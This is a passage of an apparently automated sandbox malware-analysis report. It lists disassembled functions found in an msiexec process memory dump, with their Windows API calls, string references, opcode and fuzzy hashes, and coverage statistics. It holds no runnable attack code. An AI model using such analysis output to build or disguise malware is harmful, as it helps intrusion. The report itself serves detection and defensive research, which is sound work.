                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                            • String ID:
                                                                            • API String ID: 1386444988-0
                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                            Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                            Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateMessageRectSend
                                                                            • String ID: d=E
                                                                            • API String ID: 909852535-3703654223
                                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                            Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memcpywcslen
                                                                            • String ID: "
                                                                            • API String ID: 1983396471-123907689
                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                            Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                            • String ID: URL
                                                                            • API String ID: 2108176848-3574463123
                                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemcpy
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2789212964-323797159
                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                            Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf
                                                                            • String ID: %%-%d.%ds
                                                                            • API String ID: 3988819677-2008345750
                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                            Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E770
                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendmemset
                                                                            • String ID: F^@
                                                                            • API String ID: 568519121-3652327722
                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                            Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PlacementWindowmemset
                                                                            • String ID: WinPos
                                                                            • API String ID: 4036792311-2823255486
                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@DeleteObject
                                                                            • String ID: r!A
                                                                            • API String ID: 1103273653-628097481
                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                            Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                            • String ID: _lng.ini
                                                                            • API String ID: 383090722-1948609170
                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                            Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                            • API String ID: 2773794195-880857682
                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                            Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                            Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                            • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                            Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040A908
                                                                            • free.MSVCRT ref: 0040A92B
                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                            • free.MSVCRT ref: 0040B201
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B224
                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocwcslen
                                                                            • String ID:
                                                                            • API String ID: 726966127-0
                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                            Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID:
                                                                            • API String ID: 231171946-0
                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                            • free.MSVCRT ref: 0040B0FB
                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                            • free.MSVCRT ref: 0040B12C
                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$memcpy$mallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 3669619086-0
                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                            • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                            • malloc.MSVCRT ref: 00417407
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                            • free.MSVCRT ref: 00417425
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                            Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1961120804-0
                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                            Execution Graph

                                                                            Execution Coverage:2.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0.5%
                                                                            Total number of Nodes:759
                                                                            Total number of Limit Nodes:20
